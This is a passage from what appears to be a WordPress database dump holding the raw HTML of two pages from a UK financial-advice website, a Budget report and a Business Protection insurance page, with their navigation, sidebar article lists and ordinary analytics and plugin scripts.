href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fbudget-report-2014%2F&amp;name=Budget+Report+2014&amp;description=The+Chancellor+leapt+to+his+feet%2C+announced+that+it+would+be+a+Budget+for+%E2%80%9Cmakers%2C+do-ers+and+savers%E2%80%9D+and+spent+the+next+55+minutes+reeling+off+a+list+of+surprises...\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/budget-report-2014/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"#\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=Budget Report 2014&amp;body=http://www.equalitywalk.org.uk/budget-report-2014/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\"/>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are open, but there are no comments. -->&#13;\n&#13;\n	 &#13;\n&#13;\n&#13;\n									<div id=\"respond\" class=\"comment-respond\">&#13;\n				<h3 id=\"reply-title\" class=\"comment-reply-title\"><div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../budget-report-2014/\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									</h3><form action=\"/\" method=\"post\" id=\"commentform\" class=\"comment-form\">&#13;\n																										<div id=\"comment-input\"><input type=\"text\" name=\"author\" id=\"author\" value=\"\" placeholder=\"Name (required)\" size=\"22\" tabindex=\"1\" aria-required=\"true\" class=\"input-name\"/><input type=\"text\" name=\"email\" id=\"email\" value=\"\" placeholder=\"Email (required)\" size=\"22\" tabindex=\"2\" aria-required=\"true\" class=\"input-email\"/></div>&#13;\n												<div id=\"comment-textarea\"/>												<p class=\"form-submit\">&#13;\n							<input name=\"submit\" type=\"submit\" id=\"comment-submit\" value=\"Post Comment\"/><input type=\"hidden\" name=\"comment_post_ID\" value=\"7938\" id=\"comment_post_ID\"/></p>&#13;\n						<p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"5e0447e019\"/></p>&#13;\n<p style=\"display: none;\"><input type=\"hidden\" id=\"ak_js\" name=\"ak_js\" value=\"164\"/></p>					&#13;\n							</form></div><!-- #respond -->&#13;\n			        <script type=\"text/javascript\"><![CDATA[\r\n            jQuery(document).ready(function () {\r\n                jQuery(\'#commentform\').submit(function () {\r\n                    _gaq.push(\r\n                            [\'_setAccount\', \'UA-10958181-3\'],\r\n                            [\'_trackEvent\', \'comment\', \'submit\']\r\n                    );\r\n                });\r\n            });\r\n        ]]></script></div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"display:none\">&#13;\n	<div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>people who get our best financial wisdom on a weekly basis.</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n									<div class=\"meta\">&#13;\n										June 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../5-facts-know-annuities/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n									<div class=\"meta\">&#13;\n										June 9th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				so&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div style=\"clear:both;\"/></article></section></div>				&#13;\n&#13;\n				<article class=\"col last\"/></footer></div>&#13;\n	&#13;\n			<footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><link rel=\"stylesheet\" id=\"js_composer_front-css\" href=\"../wp-content/plugins/js_composer/assets/css/js_composer_front.css\" type=\"text/css\" media=\"all\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/js/js_composer_front.js\"/></body>','Budget Report 2018','The Chancellor leapt to his feet, announced that this was a Budget for “makers, do-ers and savers” and spent 55 minutes reeling off a list of surprises ...','publish','closed','closed','','budget-report-2014','','','2017-09-21 16:58:38','2017-09-21 16:58:38','',0,'http://www.equalitywalk.org.uk/budget-report-2014',0,'page','',0),(57,1,'2017-09-21 16:34:27','2017-09-21 16:34:27','<body class=\"page page-id-7189 page-template-default light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v4\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			<div class=\"alignleft\">&#13;\n				<div class=\"header-info\">The 2017 Budget Announcement Will Improve Pension Planning for Everyone. Make Sure You Know How? <b><a href=\"../pensions/pension-review/\">Learn More&gt;&gt;</a></b><a href=\"mailto:\"/></div>&#13;\n			</div>&#13;\n			<div class=\"alignright\">&#13;\n							</div>&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:0px;margin-left:0px;margin-bottom:0px;\">&#13;\n				<a href=\"/\">&#13;\n					<img src=\"../wp-content/uploads/2013/06/RSR-Logo.png\" alt=\"Equity SMART\" class=\"normal_logo\"/></a>&#13;\n			</div>&#13;\n									<h3 class=\"tagline\">Call Us Now<br/><big><big><b/></big></big>&#13;\n								</h3></div>&#13;\n	</header><div id=\"small-nav\">&#13;\n		<div class=\"avada-row\">&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7671\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-7671\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"../pensions/\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-2 col-span-2 container\"><div class=\"row\"/>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47 fusion-dropdown-menu\"><a href=\"..\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121 fusion-dropdown-submenu\"><a href=\"..isas/\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118 fusion-dropdown-submenu\"><a href=\"..lump-sum-investment/\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102 fusion-dropdown-submenu\"><a href=\"..offshore-bonds/\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124 fusion-dropdown-submenu\"><a href=\"..unit-trusts-oeics/\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46 fusion-dropdown-menu\"><a href=\"../\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108 fusion-dropdown-submenu\"><a href=\"../asset-protection-trust/\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114 fusion-dropdown-submenu\"><a href=\"../discretionary-\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115 fusion-dropdown-submenu\"><a href=\"../absolute-\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143 fusion-dropdown-submenu\"><a href=\"../gift-loan-schemes/\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146 fusion-dropdown-submenu\"><a href=\"../wills-and-trust/\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-ancestor current-menu-parent current_page_parent current_page_ancestor menu-item-has-children menu-item-3381 fusion-dropdown-menu\"><a href=\"../insurance-protection/\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535 fusion-dropdown-submenu\"><a href=\"../critical-illness-insurance-2-0/\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585 fusion-dropdown-submenu\"><a href=\"../serious-illness-cover/\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633 fusion-dropdown-submenu\"><a href=\"../relevant-life-plan/\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228 fusion-dropdown-submenu\"><a href=\"../life-insurance/\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-7189 current_page_item menu-item-7243 fusion-dropdown-submenu\"><a href=\"../business-protection-insurance/\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a href=\"../our-blog/\">Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7678\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7678 fusion-dropdown-submenu\"><a href=\"../resources/\">Resources</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7675\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7675\"><a href=\"../contact-us/\">Contact</a></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</div>&#13;\n</div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n					<!-- START REVOLUTION SLIDER 4.3.6 fixed mode -->&#13;\n&#13;\n<div id=\"rev_slider_38_1_wrapper\" class=\"rev_slider_wrapper\" style=\"margin:0px auto;background-color:#E9E9E9;padding:0px;margin-top:0px;margin-bottom:0px;height:280px;width:960px;\">&#13;\n	<div id=\"rev_slider_38_1\" class=\"rev_slider\" style=\"display:none;height:280px;width:960px;\">&#13;\n<ul><!-- SLIDE  --><li data-transition=\"fade\" data-slotamount=\"7\">&#13;\n		<!-- MAIN IMAGE -->&#13;\n		&#13;\n		<!-- LAYERS -->&#13;\n&#13;\n		<!-- LAYER NR. 1 -->&#13;\n		<div class=\"tp-caption large_text tp-fade\" data-x=\"568\" data-y=\"57\" data-speed=\"300\" data-start=\"0\" data-easing=\"easeOutExpo\" data-splitin=\"none\" data-splitout=\"none\" data-elementdelay=\"0\" data-endelementdelay=\"0\" data-endspeed=\"300\" style=\"z-index: 2; max-width: auto; max-height: auto; white-space: nowrap;\">Business Protection&#13;\n		</div>&#13;\n&#13;\n		<!-- LAYER NR. 2 -->&#13;\n		<div class=\"tp-caption small_text tp-fade\" data-x=\"570\" data-y=\"109\" data-speed=\"300\" data-start=\"500\" data-easing=\"easeOutExpo\" data-splitin=\"none\" data-splitout=\"none\" data-elementdelay=\"0\" data-endelementdelay=\"0\" data-endspeed=\"300\" style=\"z-index: 3; max-width: auto; max-height: auto; white-space: nowrap;\">Is a key person the only thing keeping<br/> your business in the black&#13;\n		</div>&#13;\n	</li>&#13;\n	<!-- SLIDE  -->&#13;\n	<li data-transition=\"fade\" data-slotamount=\"7\">&#13;\n		<!-- MAIN IMAGE -->&#13;\n		&#13;\n		<!-- LAYERS -->&#13;\n&#13;\n		<!-- LAYER NR. 1 -->&#13;\n		<div class=\"tp-caption large_text tp-fade\" data-x=\"568\" data-y=\"57\" data-speed=\"300\" data-start=\"0\" data-easing=\"easeOutExpo\" data-splitin=\"none\" data-splitout=\"none\" data-elementdelay=\"0\" data-endelementdelay=\"0\" data-endspeed=\"300\" style=\"z-index: 2; max-width: auto; max-height: auto; white-space: nowrap;\">Business Protection&#13;\n		</div>&#13;\n&#13;\n		<!-- LAYER NR. 2 -->&#13;\n		<div class=\"tp-caption small_text tp-fade\" data-x=\"570\" data-y=\"109\" data-speed=\"300\" data-start=\"500\" data-easing=\"easeOutExpo\" data-splitin=\"none\" data-splitout=\"none\" data-elementdelay=\"0\" 